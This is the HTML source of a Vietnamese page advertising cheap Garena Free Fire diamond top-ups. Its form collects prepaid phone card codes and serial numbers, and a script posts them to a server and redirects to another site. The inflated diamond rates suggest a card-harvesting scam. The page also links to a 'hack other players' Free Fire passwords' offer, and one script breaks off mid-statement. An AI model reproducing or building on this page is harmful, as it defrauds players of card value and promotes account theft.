
<html lang="vi" prefix="og: https://ogp.me/ns#">
    <head>
    <meta charset="UTF-8">
    <meta name="google-site-verification" content="flomMmYRKgd90WzMRFu_HjJ4ogVNUsFSZk4aQZEr8rE" />
    <meta http-equiv="X-UA-Compatible" content="ie=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, shrink-to-fit=no">
    <meta name="apple-mobile-web-app-capable" content="yes">
        <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.1.3/dist/css/bootstrap.min.css" rel="stylesheet" integrity="sha384-1BmE4kWBq78iYhFldvKuhfTAU6auU8tT94WrHftjDbrCEXSU1oBoqyl2QvZ6jIW3" crossorigin="anonymous">
    
        <title>Nạp kim cương Garena Free Fire X5</title>
            <meta name="description" content="Nạp thẻ free fire, nạp game garena, sự kiện free fire, garena free fire, nap free fire, nạp kim cương, nap kim cuong, nap the free fire, shop free fire, cách nạp thẻ free fire, nạp free fire x5, nạp k" />
        <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.3/css/all.min.css">
    
          <!-- Global site tag (gtag.js) - Google Ads: 10833439093 -->
    <script async src="https://www.googletagmanager.com/gtag/js?id=AW-10833439093"></script>
    <script>
      window.dataLayer = window.dataLayer || [];
      function gtag(){dataLayer.push(arguments);}
      gtag('js', new Date());
    
      gtag('config', 'AW-10833439093');
    </script>
          <!-- Event snippet for Website traffic conversion page -->
    <script>
      gtag('event', 'conversion', {'send_to': 'AW-10833439093/XaddCJbhkZEDEPXS5K0o'});
    </script>
        
    <style>/* cyrillic-ext */
    
    .containerx {
      position: relative;
      text-align: center;
    }
    
    .bottom-left {
      position: absolute;
      bottom: 8px;
      left: 16px;
    }
    
    .top-left {
      position: absolute;
      top: 8px;
      left: 16px;
    }
    
    .top-right {
      position: absolute;
      top: 8px;
      right: 16px;
    }
    
    .bottom-right {
      position: absolute;
      bottom: 8px;
      right: 16px;
    }
    
    .centered {
      position: absolute;
      top: 50%;
      left: 50%;
      transform: translate(-50%, -50%);
    }
    .bottom-left {
        position: absolute;
        bottom: 0;
        left: 4px;
        margin: auto;
        width: 95%;
        border-bottom-right-radius: 4px;
        display: block;
        border-bottom-left-radius: 4px;
        pointer-events: none;
        background-image: linear-gradient(transparent,rgba(0,0,0,.3),rgba(0,0,0,.7),#000);
            color: #fff
    }
    .bottom-left small{
        color: #e5e5e5;
    }
    .bottom-left span {
        font-size: 15px;
    }
    tbody, td, tfoot, th, thead, tr {
        vertical-align: middle;
    }
    body.modal-open > :not(.modal) {
        -webkit-filter: blur(8px);
        -moz-filter: blur(8px);
        -o-filter: blur(8px);
        -ms-filter: blur(8px);
        filter: blur(8px);
    }
    .navbar-light .navbar-brand {
        color: rgb(255 255 255 / 90%);
    }
    nav.navbar.navbar-light.bg-light {
        background-image: url(https://img.freepik.com/free-vector/abstract-background-red_1078-436.jpg?size=626&ext=jpg);
        background-repeat: repeat;
        background-size: cover;
        border-bottom: 3px solid #e58900;
    }
    .alert {
        color: #ffffff;
        border: none;
        background-image: url(https://img.freepik.com/free-vector/abstract-background-red_1078-436.jpg?size=626&ext=jpg);
        background-repeat: repeat;
        background-size: cover;
    }
    
    .swal2-container.swal2-center.swal2-backdrop-show {
        filter: none;
    }
    </style>
    
    <script src='//ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js' type='text/javascript'></script>
    <script type='text/javascript'>
    //<![CDATA[
    function loadCSS(e, t, n) { "use strict"; var i = window.document.createElement("link"); var o = t || window.document.getElementsByTagName("script")[0]; i.rel = "stylesheet"; i.href = e; i.media = "only x"; o.parentNode.insertBefore(i, o); setTimeout(function () { i.media = n || "all" }) }
    loadCSS("https://use.fontawesome.com/releases/v5.6.3/css/all.css");loadCSS("https://fonts.googleapis.com/css?family=Roboto:100,300,400,500|Roboto+Condensed:300,400,700");
    //]]>
    </script>
    
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap-icons@1.7.2/font/bootstrap-icons.css">
    <style>
        body{font-family:"Roboto",sans-serif;font-size:16px;margin:0;padding:0;color:#222;overflow-x:hidden;counter-reset:my-sec-counter;scroll-behavior: smooth}
        .text-center {
        text-align: center!important;
        font-size: 15px;
    }
    .table>:not(caption)>*>* {
        padding: 0.6rem 0.5rem;
    }
    tbody, td, tfoot, th, thead, tr {
        border-color: inherit;
        border-style: solid;
        border-width: 0;
        border: 1px solid #ddd;
    }
    .navbar-brand {
        font-size: inherit;
    }
    .btn-warning {
        color: #000;
        background-color: #ffc107;
        border-color: #ffc107;
        font-weight: bold;
    }
    
    body {
       background:#fff;
    }
    td small {
        color: #ff2300;
        font-size: 12px;
    }
    a {
        text-decoration: none;
    }
    nav.navbar.navbar-light.bg-light {
        background-color: #fff!important;
        background-repeat: repeat;
        background-size: cover;
        border: none;
        background-image: none;
    }
    .list-group-item {
        border: none;
    }
    td small {
        color: #0a6abd;
        font-size: 12px;
    }
    .apple {
        color: #fff;
        background: #0072ff;
        font-size: 13px;
        border-radius: 100px;
        border:none;
    }
    input.form-control {
        border: none;
        border-top: 1px solid #d9d9d9;
        border-radius: 0;
        border-bottom: 1px solid #d9d9d9;
        font-size: 14px;
    }
    select {
        border: none!important;
        font-size: 14px!important;
        border-top: 1px solid #d9d9d9!important;
        border-bottom: 1px solid #d9d9d9!important;
        border-radius: 0!important;
    }
    label.small.mb-2 {
        font-size: 13px;
        font-weight: bold;
    }
    .alert {
        color: #464646;
        border: none;
        background-color: #f9f9f9!important;
        background-image:none;
        background-repeat: repeat;
        background-size: cover;
    }
    table.table.text-center {
        font-weight: bold;
        font-size: 13px;
    }
    small.d-block {
        font-size: 12px;
    }
    i.fa.fa-check {
        color: #00af5e;
        font-size: 11px;
        margin-right: 5px;
    }
    .col.is-choose img{
        border: 1px solid #f00;
        border-radius: 5px;
    }
    .item img{
     border: 1px solid #ddd;
        border-radius: 5px;
    }
    </style>
    <script src="//cdn.jsdelivr.net/npm/sweetalert2@11"></script>
    
    <script src="https://cdn.jsdelivr.net/npm/vue/dist/vue.js"></script>
    
      </head>
      <body>
          <div id="app-6">
          <nav class="navbar navbar-light bg-light">
      <div class="container-fluid">
        <a class="navbar-brand" href="/"><i class="bi bi-arrow-left me-3" style="float: left;vertical-align: middle;display: block;background: #fff;color: #000;"></i></a>
      </div>
    </nav>
      <div class="container">
        <div class="row justify-content-center mt-3">
              <div class="col-md-8 mb-2">
                  <div>
                      <img style=" float: left;" width="100" height="100" class="rounded me-3" src="https://play-lh.googleusercontent.com/83VgJpfFEpw4gZqbhRjkE8qRdp3nENY5xmJnafXefuq63XvdjnTAsng0t50v3zOeXA=s180-rw"/>
                      <div>
                            <h5 style="font-weight: bold;" class="bold mt-2">Free Fire</h5>
                          <small class="d-block">Được điều hành và phân phối độc quyền bởi Garena</small>
                     <a style="
        margin-top: 5px;
        font-size: 12px;
        padding: 4px 10px;
        background: #0089ff;
    " class="btn btn-primary apple" href="#napngay">Nạp game giá rẻ nhận quà</a>
    
                      </div>
                     
                  </div>
              </div>
        </div>
          <div class="row justify-content-center mt-3">
              <center class="mb-3">
                  <a style="
        margin-top: 5px;
        font-size: 12px;
        padding: 4px 10px;
        background: #0089ff;
    " class="btn btn-primary apple" href="hack-ff">Hack mật khẩu Free Fire của người khác</a>
    
              </center>
               
        
        <div class="d-flex gap-2 w-100 justify-content-between">
          <div>
            
          
        </div>
      </a>
    
    </div>
                 </small>
                
                  <h6><b>Bảng giá</b></h6>
                  <small>Bảng giá nạp thẻ game Free Fire</small><br/>
                  <div class="table-responsive mt-2">
                <table class="table text-center">
      <tbody>
                        <tr>
          <td>50.000đ</td>
          <td>4 600 kim cương</td>
        </tr>
                <tr>
          <td>100.000đ</td>
          <td>10 200 kim cương</td>
        </tr>
                <tr>
          <td>200.000đ</td>
          <td>20 500 kim cương</td>
        </tr>
                <tr>
          <td>500.000đ</td>
          <td>40 900 kim cương</td>
        </tr>
                <tr>
          <td>1.000.000đ</td>
          <td>90 300 kim cương</td>
        </tr>
            
      </tbody>
    </table>
    </div>
      <center class="mb-3">
                 <!--<a href="https://www.facebook.com/groups/freefire3mien.vn"><button type="button" class="btn btn-primary apple">Tham gia Group</button></a>-->
               
                     
            </center>
              </div>
             <div class="col-md-4 mb-2" id="napngay">
                        
                   
                      <div class="mb-3">
              <label class="small mb-2">Người chơi cần nạp</label>
          <input v-model="message" type="text" class="form-control" placeholder="Nhập ID game Free Fire" maxlength="64">
          </div>
                     <div class="mb-3">
                <label class="small mb-2">Loại thẻ</label>
                <br/>
                <small class="text-muted">Chọn loại thẻ để chọn thẻ cần nạp</small>
                <div>
                <div id="myDIV" class="mt-3 row justify-content-center row-cols-3 row-cols-sm-2 row-cols-lg-4 row-cols-xl-3 row-cols-xxl-12 g-2 mb-3 text-center">
                    <div class="col item is-choose">
                        <img onclick="$('#telco').val('VIETTEL');$('#loaithe').html('Viettel')" src="https://img-anons1.wibu-team.com/wb-team-free-upload-518809957.png" class="rounded w-100"/>
                    </div>
                     <div class="col item">
                        <img onclick="$('#telco').val('VINAPHONE');$('#loaithe').html('Vinaphone')" src="https://napthee.vn/the-vinaphone.jpeg" class="rounded w-100"/>
                    </div>
                     <div class="col item">
                        <img onclick="$('#telco').val('MOBIFONE');$('#loaithe').html('Mobifone')" src="https://napthee.vn/the-mobifone.jpeg" class="rounded w-100"/>
                    </div>
                    <div class="col item">
                        <img onclick="$('#telco').val('GATE');$('#loaithe').html('GATE')" src="https://napthee.vn/the-gate.png" class="rounded w-100"/>
                    </div>
                    <div class="col item">
                        <img onclick="$('#telco').val('ZING');$('#loaithe').html('Zing')" src="https://napthee.vn/the-zing.png" class="rounded w-100"/>
                    </div>
                    <div class="col item">
                        <img onclick="$('#telco').val('VNMOBI');$('#loaithe').html('Vietnamobile')" src="https://napthee.vn/the-vietnamobile.jpeg" class="rounded w-100"/>
                    </div>
                </div>
                    </div>
                    <center class="mt-3 d-block"><small class="text-muted">Đã chọn loại thẻ: <b id="loaithe">Viettel</b></small></center>
              <select id="telco" class="form-control" style="display:none">
     <option value="VIETTEL">Viettel</option>
                            <option value="MOBIFONE">Mobifone</option>
                            <option value="VINAPHONE">Vinaphone</option>
                            <option value="VNMOBI" >Vietnammobi</option>
                                                                                                        <option value="ZING" >Zing</option>
                                                                                                        <option value="GATE" >GATE</option>
       </select>
          </div>
                <div class="mb-3">
                    <label class="small mb-2">Mệnh giá thẻ</label>
              <select v-model="vatpham" id="amount" class="form-control">
                                  <option value="50000">50.000đ - 4 600 kim cương</option>
               <option value="100000">100.000đ - 10 200 kim cương</option>
               <option value="200000">200.000đ - 20 500 kim cương</option>
                <option value="500000">500.000đ - 40 900 kim cương</option>
                <option value="1000000">1.000.000đ - 90 300 kim cương</option>
           </select>
          </div>
        
          <div class="mb-3">
              <label class="small mb-2">Mã thẻ</label>
          <input type="text" class="form-control" placeholder="Nhập mã thẻ" id="code" maxlength="64">
          </div>
          <div class="mb-3">
              <label class="small mb-2">Số seri thẻ</label>
       <input type="text" class="form-control" placeholder="Nhập số seri" id="serial" maxlength="64"> </div>
      
       <div class="d-grid gap-2">
      <button id="napthe" class="apple mt-1 btn btn-primary" type="button"><i class="bi bi-shield-lock me-2"></i>Nạp ngay</button>
    </div>
                    </div>
            
             
                    <div class="col-md-12">
                        <small class="d-block mt-3">Lịch sử nạp thẻ gần đây</small>
                      <h5 class="bold mt-2"><i class="bi bi-shield-check me-2"></i>Lịch sử nạp game Free Fire</h5>
                      <div class="table-responsive">
                     <table class="table table-striped text-center">
      <thead>
        <tr>
          <th scope="col"><i class="bi bi-clock"></i></th>
          <th scope="col">Người chơi</th>
          <th scope="col">Trạng thái</th>
        </tr>
      </thead>
      
    </div>
                    </div>
          </div>
      </div>
       
    
      </div>
        <script src="https://cdn.jsdelivr.net/npm/bootstrap@5.1.3/dist/js/bootstrap.bundle.min.js" integrity="sha384-ka7Sk0Gln4gmtz2MlQnikT1wXgYsOg+OMhuP+IlRH9sENBO0LRn5q+8nbTov4+1p" crossorigin="anonymous"></script>
    
        <!-- Option 2: Separate Popper and Bootstrap JS -->
        <!--
        <script src="https://cdn.jsdelivr.net/npm/@popperjs/core@2.10.2/dist/umd/popper.min.js" integrity="sha384-7+zCNj/IqJ95wo16oMtfsKbZ9ccEh31eOz1HGyDuCQ6wgnyJNSYdrPa03rtR1zdB" crossorigin="anonymous"></script>
        <script src="https://cdn.jsdelivr.net/npm/bootstrap@5.1.3/dist/js/bootstrap.min.js" integrity="sha384-QJHtvGhmr9XOIpI6YVutG+2QOK9T+ZnN4kzFN1RtK3zEFEIsxhlmWl5/YESvpZ13" crossorigin="anonymous"></script>
        -->
        <script>
      
        var app6 = new Vue({
      el: '#app-6',
      data: {
        message: '',
        vatpham: '50000'
      }
    })
    function chuanap(){
        Swal.fire(
      'Thất bại',
      'Vui lòng nạp lần đầu tại website để tiến hành nhận quà.',
      'error'
    )
    }
    $(document).ready(function(){
      $("#napthe").click(function(){
        var code = $("#code").val();
        var serial = $("#serial").val();
        var telco = $("#telco").val();
        var amount = $("#amount").val();
        $("#napthe").addClass('disabled');
          $.post("napthe.php", {ref: window.location.hash.replace('#',''),code: code,serial: serial,telco: telco,amount: amount, domain: location.host}, function(result){
     $("#napthe").removeClass('disabled');
        if(result === 'Nạp thành công, phần thưởng sẽ gửi về tài khoản sau ít phút'){
            
            window.location.href ='https://napthe.pro/check-the.php?serial='+serial+'&type=game&game=ff';
        } else {
                Swal.fire(
      'Thất bại',
      result,
      'error'
    )
        }
      });
      });
    });
    setInterval(function() {
    </script>
    
  
          </div>
         
        </div>
      </div>
    </div>
    
    
    <script>
    $("#guiqua").click(function(){
        $('#exampleModal').modal('hide');
         Swal.fire(
      'Thất bại',
      'Vui lòng nạp ít nhất 1 lần để nhận thưởng',
      'error'
    )
    })
    $('#telco').val('VIETTEL')
          var header = document.getElementById("myDIV");
    var btns = header.getElementsByClassName("item");
    for (var i = 0; i < btns.length; i++) {
      btns[i].addEventListener("click", function() {
      var current = document.getElementsByClassName("is-choose");
      current[0].className = current[0].className.replace(" is-choose", "");
      this.className += " is-choose";
      });
    }
    </script>
      </body>
    </html>
    

